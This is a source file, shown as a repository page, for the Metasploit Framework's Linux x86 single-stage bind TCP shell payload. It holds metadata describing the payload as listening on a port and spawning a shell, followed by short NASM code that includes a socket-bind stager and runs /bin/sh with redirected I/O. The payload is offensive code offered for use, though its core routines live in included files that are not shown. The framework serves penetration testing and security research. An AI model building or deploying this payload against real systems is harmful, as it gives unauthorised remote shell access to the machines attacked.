Files
metasploit-gs/external/source/shellcode/linux/ia32/single_bind_tcp_shell.asm
T

40 lines
876 B
NASM
Raw Normal View History

2007-04-29 20:27:23 +00:00
;;
;
; Name: single_bind_tcp_shell
; Version: $Revision: 1512 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Single portbind TCP shell.
;
; Meta-Information:
;
; meta-shortname=Linux Bind TCP Shell
; meta-description=Listen on a port and spawn a shell
; meta-authors=skape <mmiller [at] hick.org>
; meta-os=linux
; meta-arch=ia32
; meta-category=single
; meta-connection-type=bind
; meta-name=bind_tcp_shell
; meta-basemod=Msf::PayloadComponent::BindConnection
; meta-offset-lport=0x14
;;
BITS 32
%define USE_SINGLE_STAGE 1
%define FD_REG_EBX
%define ASSUME_REG_EAX 0
%define ASSUME_REG_EDX 0
%include "generic.asm"
%include "stager_sock_bind.asm"
shell:
execve_binsh EXECUTE_REDIRECT_IO